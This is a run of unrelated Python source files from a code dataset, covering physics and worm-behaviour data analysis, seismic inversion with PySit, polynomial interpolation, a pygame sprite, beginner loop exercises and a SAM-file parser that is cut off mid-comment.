sigma_MHz = coeff[2]\n FWHM_MHz = 2*np.sqrt(2*np.log(2)) * coeff[2]\n #label_str = '$\\mu$ = %0.1f MHz, FWHM = %0.1f MHz' % (mu_MHz,FWHM_MHz)\n label_str = '%s track: $\\mu$ = %0.1f MHz, $\\sigma$ = %0.1f MHz' % (ordinal(track_n+1),mu_MHz,sigma_MHz)\n linehandle1 = plt.plot(xx, gauss_fit_y, '--', color=colorlist[track_n], linewidth=lw1, label=label_str )\n results['mu'][nb_tracks][track_n] = mu_MHz\n results['sigma'][nb_tracks][track_n] = sigma_MHz\n results['FWHM'][nb_tracks][track_n] = FWHM_MHz\n if flag_MPT_show_hists:\n fbins_center = (fbins_max+fbins_min)/2\n plt.grid(True)\n plt.xlim([fbins_center-70,fbins_center+50])\n plt.ylim(0, max(16,np.ceil(max_counts_in_fbins/5)*5))\n ax = plt.axis()\n plt.xlabel(\"Track Frequency [MHz]\")\n plt.ylabel(\"Counts\")\n plt.legend(loc='upper right',fontsize='small')\n plt.text(ax[0]+3,ax[3]-(ax[3]-ax[2])/5,'Event Sequences with %d peaks\\n(%d/%d events)' % (nb_tracks,np.sum(cut_good),len(np.unique(data['candidate_tracks']['UniqueEventID']))))\n\n if flag_save_fig:\n plt.gcf().set_size_inches(15,10)\n figname2 = figname1+'_HistWithNumberOfTracks'\n plt.savefig(figname2+'.pdf',format='pdf',pad_inches=0.1)\n plt.show()\n\n\n\nif False:\n plt.figure(50)\n plt.clf()\n for ii,nb_tracks in enumerate(np.unique(data['candidate_tracks']['MultiPeakTracks_Total'])):\n if nb_tracks>1:\n cut_nb_tracks = data['candidate_tracks']['MultiPeakTracks_Total']==nb_tracks\n tracks_freq = data['candidate_tracks']['StartFrequency'][cut_nb_tracks]/1e6\n plt.hist(tracks_freq,np.arange(0,200,1))\n\n\nif flag_look_at_sidebands:\n plt.figure(60)\n plt.clf()\n\n plt.figure(70)\n plt.clf()\n colorlist = ['darkgreen','blue']\n\n nb_sigma = 5\n max_counts_in_fbins = 0\n max_counts_in_ebins = 0\n tracks_freq_MHz = data['candidate_tracks']['StartFrequency']/1e6+fbins_min\n tracks_freq_Hz = data['candidate_tracks']['StartFrequency']+data['metadata']['minimum_frequency'][0]+run_params['freq_mixer_hi']\n tracks_ene = ana.Freq2Energy(tracks_freq_Hz, run_params['b_avg_total_T'])\n cut_seq = data['candidate_tracks']['EventSequenceID']==0\n for i in np.arange(1,3):\n if i==1:\n nb_tracks=2\n track_n=0\n ebins_w=0.0002\n if i==2:\n nb_tracks=2\n track_n=1\n ebins_w=0.005\n fbins_MHz = np.arange(fbins_min,fbins_max+fbins_w,fbins_w)\n ebins_keV = np.arange(np.min(tracks_ene),np.max(tracks_ene),ebins_w)\n #f_range_MHz = results['mu'][nb_tracks][track_n] + 
(np.array([-1,1])*nb_sigma*results['sigma'][nb_tracks][track_n])\n f_range_MHz = results['mu'][nb_tracks][track_n] + np.array([-5,10])\n cut_f = (tracks_freq_MHz>f_range_MHz[0]) & (tracks_freq_MHz=t_range[0]) & (data['candidate_tracks']['StartTimeInAcq']*1e3<=t_range[1])\n # Select only 3-track MTP tracks\n cut_good = cut_track_0 & cut_t\n if False:\n nb_tracks = 3\n cut_nb_tracks = (data['candidate_tracks']['MultiPeakTracks_Total']==nb_tracks)\n cut_good = cut_track_0 & cut_t & cut_nb_tracks\n cut_f_data = fdata[cut_good]\n\n # Set these according to figure(40) results\n nb_sigma = 3\n\n # Central peak identification - call it cp\n\n f_range_MHz_cp = results['mu'][2][0]+np.array([-1,1])*nb_sigma*results['sigma'][2][0]\n\n # Rightmost (highest frequency) sideband identification - call it s2\n\n f_range_MHz_s2 = results['mu'][2][1]+np.array([-1,1])*nb_sigma*results['sigma'][2][1]\n\n s1_cut = np.zeros_like(cut_f_data,dtype=bool)\n cp_cut = np.zeros_like(cut_f_data,dtype=bool)\n s2_cut = np.zeros_like(cut_f_data,dtype=bool)\n\n for i,value in np.ndenumerate(cut_f_data):\n # Check for cp\n if value >= f_range_MHz_cp[0] and value <= f_range_MHz_cp[1]:\n s1_cut[i] = False\n cp_cut[i] = True\n s2_cut[i] = False\n # Check for s2\n elif value >= f_range_MHz_s2[0] and value <= f_range_MHz_s2[1]:\n s1_cut[i] = False\n cp_cut[i] = False\n s2_cut[i] = True\n\n #################################################################################################################################\n if False:\n # Now to identify which sidebands belong to which central peaks...\n # Recall that all tracks in the same MultiPeakTrack or Sequence have the same EventSequenceID, but since this is already set to zero for all the cut tracks it doesn't help us\n # However, \"UniqueEventID combines AcqIDInDSet and EventID to create a unique ID for each event inside a run\" from P8MiscAnalysis.py - we'll use this\n\n cut_UniqueEventID = data['candidate_tracks']['UniqueEventID'][cut_good]\n\n\n # Just to take a look at where bands sit within UniqueEventID\n plt.figure(100)\n plt.clf()\n plt.xlabel('Index')\n plt.ylabel('UniqueEventID')\n plt.plot(cut_UniqueEventID,'wo') \n\n for i, value in np.ndenumerate(cut_UniqueEventID):\n if s1_cut[i] == True:\n plt.plot(i,value,'g+') \n for i, value in np.ndenumerate(cut_UniqueEventID):\n if cp_cut[i] == True:\n plt.plot(i,value,'b+')\n for i, value in np.ndenumerate(cut_UniqueEventID):\n if s2_cut[i] == True:\n plt.plot(i,value,'r+')\n \n plt.show()\n\n # ... 
seems like there are not a lot (actual almost none at all) which have two sidebands and a central peak (as defined by the above criteria)\n # this means that, although we've elected only to look 3-track MTP tracks, most of them have either one sideband or the other present, or no central peak and only sidebands\n\n #################################################################################################################################\n\n # Getting energy\n\n tracks_freq_Hz = data['candidate_tracks']['StartFrequency']+data['metadata']['minimum_frequency'][0]+run_params['freq_mixer_hi'] # see Luiz' session line 395\n tracks_ene = ana.Freq2Energy(tracks_freq_Hz, run_params['b_avg_total_T'])\n cut_e_data = tracks_ene[cut_good] # apply same cut as for frequency\n\n plt.figure(101)\n #plt.scatter(cut_e_data,cut_f_data,c='w')\n plt.xlabel(\"Track Energy [keV]\")\n plt.ylabel(\"Track Frequency [MHz]\")\n plt.title('{} keV peak, run_id = {}'.format(run_params['peak_e_keV'],run_params['run_id']))\n\n for i, value in np.ndenumerate(cut_e_data):\n if cp_cut[i] == True:\n plt.scatter(cut_e_data[i],cut_f_data[i],c='g')\n for i, value in np.ndenumerate(cut_e_data):\n if s2_cut[i] == True:\n plt.scatter(cut_e_data[i],cut_f_data[i],c='r')\n\n plt.show()\n \n\n\n\n\n","sub_path":"PhaseI/MTP_session_prospectus/v00_081516/17keV/run_id_294/MPT_session_294.py","file_name":"MPT_session_294.py","file_ext":"py","file_size_in_byte":26467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"152310126","text":"import pygame\nfrom pygame.sprite import Sprite \nimport time\n\nclass Fan(Sprite):\n\tdef __init__(self, screen):\n\t\tsuper(Fan,self). __init__()\n\t\tself.image = pygame.image.load(\"fan_image.png\")\n\t\t#self.rect = pygame.Rect(100, 100, 50, 100)\n\t\tself.rect = self.image.get_rect()\n\t\tself.x = 0\n\t\tself.y = 575\n\t\tself.dx = 10\n\t\tself.width = 47\n\t\tself.height = 85\n\t\tself.speed = 10\n\t\tself.screen = screen\n\t\tself.direction = 1\n\t\t# self.stunned = False\n\t\t# self.when_stunned = time.time()\n\n\tdef draw_me(self):\n\t\t#self.rect = pygame.Rect(self.x, self.y, self.width, self.height)\n\t\tself.rect.left = self.x -20\n\t\tself.rect.right = self.x + 20\n\t\tself.rect.top = self.y -20\n\t\tself.rect.bottom = self.y +20\n\t\tself.screen.blit(self.image, [self.x, self.y])","sub_path":"Fan.py","file_name":"Fan.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"293728006","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 13 16:45:47 2017\n\n@author: ajaver\n\"\"\"\n\nimport os\nimport itertools\nimport pandas as pd\nimport numpy as np\nfrom functools import partial\n\nfrom sklearn.manifold import TSNE\nfrom sklearn.decomposition import PCA, SparsePCA, FastICA\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nimport statsmodels.stats.multitest as smm\nfrom scipy.stats import ttest_ind\nimport seaborn as sns\nimport matplotlib.pylab as plt\nfrom scipy.stats import f_oneway\n\n#from tierpsy_features.features import timeseries_columns, ventral_signed_columns, morphology_columns\n\n#%%\ndef _anova_analysis(feat_means_df, feats2check, pairs2compare = None):\n feat_strain_g = feat_means_df.groupby('strain')\n #anova test\n stats = []\n for feat in feats2check:\n dat = [g[feat].dropna().values for _, g in feat_strain_g]\n fstats, pvalue = f_oneway(*dat)\n\n #get the degree's of freedom. 
I took these formulas from the f_oneway scipy repo\n #prob = special.fdtrc(dfbn, dfwn, f) # equivalent to stats.f.sf\n bign = sum(x.size for x in dat)\n num_groups = len(dat)\n dfbn = num_groups - 1\n dfwn = bign - num_groups\n \n stats.append((feat, fstats, pvalue, dfbn, dfwn))\n feat, fstats, pvalue, df1, df2 = zip(*stats)\n fstatistics = pd.DataFrame(list(zip(fstats, pvalue, df1, df2)), \n index=feat, columns=['fstat', 'pvalue', 'df1', 'df2'])\n \n reject, pvals_corrected, alphacSidak, alphacBonf = \\\n smm.multipletests(fstatistics['pvalue'].values, method = 'fdr_tsbky')\n fstatistics['pvalue_adj'] = pvals_corrected\n \n #pairwise comparison\n all_comparisons = []\n if pairs2compare is None:\n pairs2compare = list(itertools.combinations(feat_strain_g.groups.keys(), 2))\n \n for x1,x2 in pairs2compare:\n a = feat_strain_g.get_group(x1).dropna()\n b = feat_strain_g.get_group(x2).dropna()\n \n for feat in feats2check:\n tstatistic, pvalue = ttest_ind(a[feat].values, b[feat].values)\n all_comparisons.append((x1, x2, feat, tstatistic, pvalue))\n \n multi_comparisons = pd.DataFrame(all_comparisons, \n columns=['strain1', 'strain2', 'feat', 'tstatistic', 'pvalue'])\n \n reject, pvals_corrected, alphacSidak, alphacBonf = \\\n smm.multipletests(multi_comparisons['pvalue'].values, method = 'fdr_tsbky')\n multi_comparisons['pvalue_adj'] = pvals_corrected\n\n return fstatistics, multi_comparisons\n#%%\nif __name__ == '__main__':\n save_dir_root = './anova_tests'\n\n \n comparisons_keys = dict(\n N2 = (\n ['N2_Ctrl_Day7','N2_Ti5_Day7', 'N2_Fe5_Day7'], \n [('N2_Ctrl_Day7', 'N2_Ti5_Day7'), \n ('N2_Ctrl_Day7', 'N2_Fe5_Day7')\n ]\n ),\n NL5901 = (\n ['NL5901_Ctrl_Day7', 'NL5901_Ti5_Day7', 'NL5901_Fe5_Day7'], \n [('NL5901_Ctrl_Day7', 'NL5901_Ti5_Day7'), \n ('NL5901_Ctrl_Day7', 'NL5901_Fe5_Day7')\n ]\n )\n \n )\n \n save_dir = '/Users/ajaver/OneDrive - Imperial College London/tierpsy_features/results/dementia_nanoparticles'\n feat_fname = os.path.join(save_dir, 'nell_tierpsy_features.csv')\n feat_means_df = pd.read_csv(feat_fname, index_col=False)\n index_cols = ['Unnamed: 0', 'id', 'strain', 'n_worms', 'directory', 'base_name', 'exp_name']\n \n feats2check = [x for x in feat_means_df if x not in index_cols]\n feats2check = [x for x in feats2check if 'IQR' not in x]\n \n for comparison_type, (strain_order, pairs2compare) in comparisons_keys.items():\n save_dir = os.path.join(save_dir_root, comparison_type)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n print(comparison_type)\n df = feat_means_df[feat_means_df['strain'].isin(strain_order)]\n fstatistics, multi_comparisons = _anova_analysis(df, feats2check, pairs2compare = None)\n fstatistics = fstatistics.sort_values(by='pvalue_adj')\n\n #%%\n \n save_name = os.path.join(save_dir, 'boxplot.pdf')\n with PdfPages(save_name) as pdf_pages:\n for feat, row in fstatistics.iterrows():\n f, ax = plt.subplots(figsize=(15, 6))\n sns.boxplot(x ='strain', \n y = feat, \n data = feat_means_df, \n order= strain_order\n )\n sns.swarmplot(x ='strain', y = feat, data = feat_means_df, color=\".3\", linewidth=0, order= strain_order)\n ax.xaxis.grid(True)\n ax.set(ylabel=\"\")\n sns.despine(trim=True, left=True)\n \n args = (feat, int(row['df1']), int(row['df2']), row['fstat'], row['pvalue'])\n strT = '{} | f({},{})={:.3} | (p-value {:.3})'.format(*args)\n plt.suptitle(strT)\n plt.xlabel('')\n \n pdf_pages.savefig()\n plt.close()\n #%%\n dd = {x:ii for ii,x in enumerate(fstatistics.index)}\n multi_comparisons['m'] = multi_comparisons['feat'].map(dd)\n 
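        # 'm' is a temporary ordering column: it ranks each pairwise row by its feature's position in the ANOVA-sorted table\n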
multi_comparisons = multi_comparisons.sort_values(by='m')\n del multi_comparisons['m']\n \n save_name = os.path.join(save_dir, 'pair_comparisons.csv')\n multi_comparisons.to_csv(save_name, index=False)\n#%% \n\n\n \n# #%%\n# strain_order = ['N2', 'DAG356', \n# 'TR2171', 'DAG618', \n# 'DAG658', 'DAG680', \n# 'DAG515', 'DAG675', \n# 'DAG666', 'DAG667', 'DAG668', 'DAG676', \n# 'DAG677', 'DAG678', 'DAG679']\n# cols_ind = [0, 0, \n# 1, 1, \n# 2, 2, \n# 3, 3, \n# 4, 4, 4, 4, 4, 4, 4]\n# \n# \n# current_palette = sns.color_palette()\n# cols = [current_palette[x] for x in cols_ind]\n# assert len(strain_order) == len(cols)\n# col_dict = {k:v for k,v in zip(strain_order, cols)}\n# \n# \n# \n# #%%\n# if True:\n# #median_values = feat_strain_g.median()\n# \n# save_name = os.path.join('{}/boxplot_anova.pdf'.format(save_dir))\n# with PdfPages(save_name) as pdf_pages:\n# for feat, row in stat_values.iterrows():\n# \n# f, ax = plt.subplots(figsize=(15, 6))\n# sns.boxplot(x ='strain', \n# y = feat, \n# data = feat_means_df, \n# order= strain_order,\n# palette = col_dict\n# )\n# sns.swarmplot(x ='strain', y = feat, data = feat_means_df, color=\".3\", linewidth=0, order= strain_order)\n# ax.xaxis.grid(True)\n# ax.set(ylabel=\"\")\n# sns.despine(trim=True, left=True)\n# plt.suptitle('{} (p-value {:.3})'.format(feat, row['pvalue']))\n# plt.xlabel('')\n# \n# #dd = median_values[feat].argsort()\n# #strain_order = list(dd.index[dd.values])\n# #n2_ind = strain_order.index('N2')\n# #plt.plot((n2_ind,n2_ind), plt.ylim(), '--k', linewidth=2)\n# \n# pdf_pages.savefig()\n# plt.close(f)\n# \n# #%%\n# df = feat_means_df.dropna()\n# \n# valid_feats = [x for x in feat_means_df if x not in ['strain'] ]\n# X = df[valid_feats].values.copy()\n# \n# x_min, x_max = np.min(X, 0), np.max(X, 0)\n# X = (X - x_min)/(x_max - x_min)\n# \n# #X = (X - np.mean(X, 0))/np.std(X, 0)\n# #%%\n# pca = PCA()\n# X_pca = pca.fit_transform(X)\n# \n# pca_s = SparsePCA()\n# X_pca_s = pca_s.fit_transform(X)\n# #%%\n# \n# #for p in [5, 8, 10, 12, 15, 20, 30]:\n# tsne = TSNE(n_components=2, \n# #perplexity = p,\n# init='pca',\n# verbose=1, \n# n_iter=10000\n# )# random_state=0)\n# X_tsne = tsne.fit_transform(X)\n# \n# plt.figure()\n# plt.plot(X_tsne[:, 0], X_tsne[:, 1], 'o')\n# #%%\n# from matplotlib.lines import Line2D\n# import itertools\n# \n# marker_cycle = itertools.cycle(Line2D.filled_markers)\n# mks = [next(marker_cycle) for _ in strain_order]\n# #%%\n# save_name = os.path.join('{}/clustering.pdf'.format(save_dir))\n# with PdfPages(save_name) as pdf_pages:\n# \n# dat = {'t-SNE':X_tsne, 'PCA':X_pca, 'PCA_Sparse':X_pca_s}\n# #%%\n# for k,Xp in dat.items():\n# \n# \n# X_df = pd.DataFrame(Xp[:, 0:2], columns=['X1', 'X2'])\n# X_df['strain'] = df['strain'].values\n# \n# g = sns.lmplot('X1', # Horizontal axis\n# 'X2', # Vertical axis\n# data=X_df, # Data source\n# fit_reg=False, # Don't fix a regression line\n# hue = 'strain',\n# hue_order = strain_order,\n# palette = col_dict,\n# size= 8,\n# scatter_kws={\"s\": 100},\n# legend=False,\n# aspect = 1.2,\n# markers = mks\n# )\n# \n# box = g.ax.get_position() # get position of figure\n# g.ax.set_position([box.x0, box.y0, box.width * 0.8, box.height]) # resize position\n# \n# g.ax.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n# plt.title(k)\n# pdf_pages.savefig()\n# \n# plt.close('all') \n# #%%\n# \n# strT = 'PCA'\n# Xr = X_pca\n# \n# save_name = os.path.join('{}/{}.pdf'.format(save_dir, strT))\n# with PdfPages(save_name) as pdf_pages:\n# \n# plt.figure()\n# 
plt.plot(np.cumsum(pca.explained_variance_ratio_), '.')\n# plt.title('Explained Variance')\n# pdf_pages.savefig()\n# \n# for n in range(10):\n# df['p_dist'] = Xr[:, n]\n# \n# f, ax = plt.subplots(figsize=(15, 6))\n# \n# sns.boxplot(x = 'strain', \n# y = 'p_dist', \n# data = df, \n# order= strain_order,\n# palette = col_dict\n# )\n# sns.swarmplot(x = 'strain', \n# y = 'p_dist', \n# data = df,\n# color=\".3\", \n# linewidth=0, \n# order= strain_order\n# )\n# \n# plt.title('{}_{} var explained: {:.2}'.format(strT, n+1, pca.explained_variance_ratio_[n]))\n# pdf_pages.savefig()\n# \n# plt.close('all')\n# #%%\n# \n# strT = 'PCA_Sparse'\n# Xr = X_pca_s\n# \n# save_name = os.path.join('{}/{}.pdf'.format(save_dir, strT))\n# with PdfPages(save_name) as pdf_pages:\n# #http://www.tandfonline.com/doi/pdf/10.1198/106186006X113430?needAccess=true\n# q, r = np.linalg.qr(X_pca_s)\n# explained_variance = np.diag(r)**2\n# explained_variance_ratio = explained_variance/np.sum(explained_variance)\n# \n# plt.figure()\n# plt.plot(np.cumsum(explained_variance_ratio), '.')\n# plt.title('Explained Variance')\n# pdf_pages.savefig()\n# \n# \n# for n in range(10):\n# df['p_dist'] = Xr[:, n]\n# #df['p_dist'] = np.linalg.norm((X_pca - n2_m)[:,:(n+1)], axis=1)\n# \n# f, ax = plt.subplots(figsize=(15, 6))\n# \n# sns.boxplot(x = 'strain', \n# y = 'p_dist', \n# data = df, \n# order= strain_order,\n# palette = col_dict\n# )\n# sns.swarmplot(x = 'strain', \n# y = 'p_dist', \n# data = df,\n# color=\".3\", \n# linewidth=0, \n# order= strain_order\n# )\n# \n# pca_s.components_[0, :]\n# plt.title('{}_{} var explained: {:.2}'.format(strT, n+1, explained_variance_ratio[n]))\n# pdf_pages.savefig()\n# \n# plt.close('all')\n# #%%\n# save_name = os.path.join('{}/{}.txt'.format(save_dir, strT))\n# with open(save_name, 'w') as fid:\n# for n in range(10):\n# vec = pca_s.components_[n, :]\n# inds, = np.where(vec!=0)\n# dd = [(valid_feats[ii],vec[ii]) for ii in inds]\n# \n# fid.write('***** PCA Sparse {} *****\\n'.format(n+1))\n# for feat in sorted(dd):\n# fid.write('{} {:.3}\\n'.format(*feat))\n# fid.write('\\n')\n ","sub_path":"dementia_nanoparticles/anova.py","file_name":"anova.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"268515703","text":"#nums = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nnums = range(11)\naccum = 0\nfor w in nums:\n\taccum = accum + w\n\tprint (accum)\nprint (\"range(0,5): \")\nfor i in range(0, 5):\n\tprint (i)\nprint (\"range(5): \")\nfor i in range(5):\n print (i)\nprint (list(range(5)))\nprint (list(range(0,5)))\nprint(range(0,5))\nnumbers = range(41)\nsum1 = 0\nfor sum in numbers:\n sum1 =sum1 + sum\nprint (sum1)\nstr1 = \"I like nonsense, it wakes up the brain cells. 
Fantasy is a necessary ingredient in living.\"\nnumbs = 0\nfor character in str1:\n numbs += 1\nprint(numbs)\nfruits = ['apple', 'pear', 'apricot', 'cherry', 'peach']\nfor n in range(len(fruits)):\n print(n, fruits[n])\n\ns = input(\"Enter some text\") #The Accumulator Pattern with Strings\nac = \"\"\nfor c in s:\n ac = ac + c + \"-\" + c + \"-\"\n\nprint(ac)","sub_path":"accumulatorpattern.py","file_name":"accumulatorpattern.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"286041468","text":"# Std import block\nimport time\nimport os\nimport copy\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom pysit import *\nfrom pysit.gallery import triangular_reflector\n\nif __name__ == '__main__':\n # Setup\n frequencySolver = True\n hybrid=False\n\n nRcv = 80\n # enable Open MP multithread solver\n os.environ[\"OMP_NUM_THREADS\"] = \"16\"\n \n # Define Domain\n pmlx = PML(0.1, 100)\n pmlz = PML(0.1, 100)\n\n x_config = (-1.0, 1.0, pmlx, pmlx)\n z_config = (-1.0, 1.0, pmlz, pmlz)\n\n d = RectangularDomain(x_config, z_config)\n\n m = CartesianMesh(d, 201, 201)\n\n # Generate true wave speed\n C, C0, m, d = triangular_reflector(m,reflector_width = [0.05, 0.05], reflector_position =[(0.0, -0.2), (0.0, 0.2)])\n\n \n h = 2*np.pi/nRcv\n xRcv = np.sin(np.linspace(0, 2*np.pi-h, nRcv)) \n zRcv = np.cos(np.linspace(0, 2*np.pi-h, nRcv)) \n\n radiousSrc = 0.75\n\n source_list = []\n for x,z in zip(xRcv, zRcv):\n source_list.append(PointSource(m, (radiousSrc*x, radiousSrc*z), \n RickerWavelet(10.0), intensity = 1.0))\n \n #2 PointSource objects are defined above. Group them together in a single SourceSet\n source_set = SourceSet(m,source_list)\n\n radiousRcv = 0.5\n\n receivers = ReceiverSet(m, [PointReceiver(m, (radiousRcv*x[0], radiousRcv*x[1])) for x in zip(xRcv, zRcv)])\n\n shots = []\n for source in source_list:\n receiverscopy = copy.deepcopy(receivers)\n shots.append(Shot(source, receiverscopy))\n\n\n if frequencySolver:\n solver = ConstantDensityHelmholtz(m, spatial_accuracy_order=6)\n frequencies = [2.5, 5.0, 10.0]\n\n # Generate synthetic Seismic data\n print('Generating data...')\n base_model = solver.ModelParameters(m,{'C': C})\n tt = time.time()\n generate_seismic_data(shots, solver, base_model, frequencies=frequencies)\n print('Data generation: {0}s'.format(time.time()-tt))\n\n else:\n # Define and configure the wave solver\n trange = (0.0,3.0)\n\n solver_time = ConstantDensityAcousticWave(m,\n spatial_accuracy_order=6,\n kernel_implementation='omp',\n trange=trange)\n # Generate synthetic Seismic data\n print('Generating data...')\n base_model = solver_time.ModelParameters(m,{'C': C})\n tt = time.time()\n generate_seismic_data(shots, solver_time, base_model)\n print('Data generation: {0}s'.format(time.time()-tt))\n\n # Define and configure the objective function\n if hybrid:\n solver = ConstantDensityAcousticWave(m,\n spatial_accuracy_order=4,\n trange=trange)\n objective = HybridLeastSquares(solver)\n else:\n\n solver = ConstantDensityHelmholtz(m,\n spatial_accuracy_order=4)\n objective = FrequencyLeastSquares(solver)\n\n # Define the inversion algorithm\n invalg = LBFGS(objective)\n initial_value = solver.ModelParameters(m,{'C': C0})\n\n # Execute inversion algorithm\n print('Running Descent...')\n tt = time.time()\n\n status_configuration = {'value_frequency' : 1,\n 'residual_frequency' : 1,\n 'residual_length_frequency' : 1,\n 'objective_frequency' : 1,\n 'step_frequency' : 1,\n 
'step_length_frequency' : 1,\n 'gradient_frequency' : 1,\n 'gradient_length_frequency' : 1,\n 'run_time_frequency' : 1,\n 'alpha_frequency' : 1,\n }\n invalg.max_linesearch_iterations=20\n\n #loop_configuration=[(60,{'frequencies' : [2.0, 3.5, 5.0]}), (15,{'frequencies' : [6.5, 8.0, 9.5]})] #3 steps at one set of frequencies and 3 at another set\n\n # loop_configuration=[(40,{'frequencies' : [10.0]}),\n # (20,{'frequencies' : [20.0]}), \n # (5,{'frequencies' : [40.0]})]\n\n loop_configuration=[(20,{'frequencies' : [2.5]}),\n (10,{'frequencies' : [5.0]}),\n (10,{'frequencies' : [10.0]})]\n\n result = invalg(shots, initial_value, loop_configuration, verbose=True, status_configuration=status_configuration)\n\n print('...run time: {0}s'.format(time.time()-tt))\n\n obj_vals = np.array([v for k,v in list(invalg.objective_history.items())])\n\n plt.figure()\n plt.semilogy(obj_vals)\n\n fig = plt.gcf()\n fig.set_size_inches(18.5, 10.5)\n plt.savefig('decay_triangle_small.png')\n\n plt.figure()\n plt.subplot(3,1,1)\n vis.plot(C0, m)\n plt.title('Initial Model')\n plt.subplot(3,1,2)\n vis.plot(C, m)\n plt.title('True Model')\n plt.subplot(3,1,3)\n vis.plot(result.C, m)\n plt.title('Reconstruction')\n\n fig = plt.gcf()\n fig.set_size_inches(4, 12)\n\n plt.savefig('reconstruction_triangle_small.png')\n #plt.show()\n\n","sub_path":"examples/triangle_reflectors_halfwavelength.py","file_name":"triangle_reflectors_halfwavelength.py","file_ext":"py","file_size_in_byte":5208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"199981587","text":"from Tabulirovanie_transtsendentnykh_funktsiy import *\nimport matplotlib.pyplot as plt\n\nfrom scipy.special import *\nfrom scipy.integrate import quad\n\ndef SecondTask(count):\n n = count\n print('Total number of node points = {}'.format(n))\n \n x = np.linspace(0, 2, n)\n f = np.array(FirstTaskWithParametrs(x, 0.000001))\n print ('Node points and f(x)')\n for i in range(len(x)):\n print('f({:.3f})={:.6f}' .format( x[i], f[i]))\n xMiddle = [x[i] + (x[i] - x[i - 1]) / 2 for i in range(1, len(x) - 1)]\n xMiddle.insert(0, 0)\n xMiddle = np.array(xMiddle)\n fInMiddle = np.array(FirstTaskWithParametrs(xMiddle, 0.000001))\n print('Midpoints and f(x)')\n for i in range(len(xMiddle)):\n print('f({:.3f})={:.6f}'.format(xMiddle[i], fInMiddle[i]))\n nMiddle=len(xMiddle)\n print('Total number of midpoints = {}'.format(nMiddle))\n\n def Ln(currentX):\n S=0\n for i in range(n):\n proiz=1\n for j in range(n):\n if i!=j:\n proiz*=(currentX-x[j])/(x[i]-x[j])\n S+=proiz*f[i]\n return S\n L=np.array([Ln(xi) for xi in xMiddle])\n difference = abs(fInMiddle - L)\n print('Maximum interpolation error = {}'.format(max(difference)))\n return x, f, L, difference\n","sub_path":"я2.py","file_name":"я2.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"527845928","text":"num=int(input())\narr=[]\nres=[]\nfor i in range(0,num*2):\n arr=arr+[input()]\nk=0\nb=False\nfor p in range(0,num):\n k=0\n for i in range(0,len(arr[2*p])):\n b = False\n for j in range(0,len(arr[2*p+1])):\n j=j+k\n if arr[2*p][i:i+1]==arr[2*p+1][j:j+1]:\n if arr[2*p][i:i+1]==arr[2*p+1][j+1:j+2]:\n break\n else:\n b=True\n k=j\n break\n if not b:\n break\n if b:\n print('YES')\n else:\n 
print('NO')\n\n\n\n\n","sub_path":"Code/CodeRecords/2972/60644/254232.py","file_name":"254232.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139276131","text":"import explanes as el\n\nif __name__ == \"__main__\":\n el.experiment.run()\n\ndef set(args):\n experiment = el.Experiment()\n experiment.factor.factor1=[1, 3]\n experiment.factor.factor2=[2, 4]\n return experiment\n\ndef step(setting, experiment):\n print(setting)\n","sub_path":"examples/examples/experiment_run.py","file_name":"experiment_run.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"160184424","text":"# Please change this according to the directory you are currently using.\n# Please revise the \"files_to_parse.txt\" accordingly.\nlist_of_files = \"/u/home/s/shahar/anaconda3/research/consistency_read_aligners/unmapped/nresults/files.txt\"\n# This opens the \"files_to_parse.txt\", this is the list of files that we want to parse.\nf = open(list_of_files, \"r\")\n# This opens the file that we're going to write the data to.\nfinalFile = open(\"Final.txt\", \"w+\")\n# This for loop runs for each file in the list of files.\nfor file in f:\n # This line takes off the new line at the end of the string.\n file = file[:-1]\n # This is to visually check what files have actually been run.\n print(file)\n # This opens the current sam file to read.\n currFile = open(file, 'r')\n # Checking to see if we're in read mode.\n if currFile.mode == \"r\":\n # We then read the whole file line by line into a list of lines.\n lines = currFile.readlines()\n # This closes the current file so we don't have an issue when we open a new current file.\n currFile.close()\n # This just sets the flag to false for something up ahead.\n flag = False\n # For each line in the file we're going to sift through the line to get the information that we want.\n # What we want is to know whether the reads have been mapped or not mapped. A \"*\" means unmapped and \"REFERENCE\" means mapped.\n for line in lines:\n # So! We've finally gotten to the flag.\n # Essentially the flag is there to help identify the actual tool that we are using.\n # Before looking at the reads, the program will to identify what the tool they're currently looking at is.\n # Therefore, every line that it looks at, it looks for an \"ID:\". Currently this is flawed as many tools\n # can have multiple \"ID:\". Thus it is still a work in progress. (10/25/2019)\n # Yet, if it finds the ID, then we know that the reads are coming next. Thus, we take the reads after that by\n # setting the flag to be true. This will be improved.\n if line.find(\"ID:\") != -1:\n # Splits the line string and places the pieces of that string into a list.\n lineList = line.split()\n # Writes to identity of the tool to the file.\n finalFile.write(lineList[1])\n finalFile.write(\", \")\n # The famous flag\n flag = True\n # This runs if it is a line that starts with the read identifier.\n elif flag:\n # This splits the line to make a list that is easier to work with.\n lineList = line.split()\n # Currently this program is flawed (10/25/2019). 
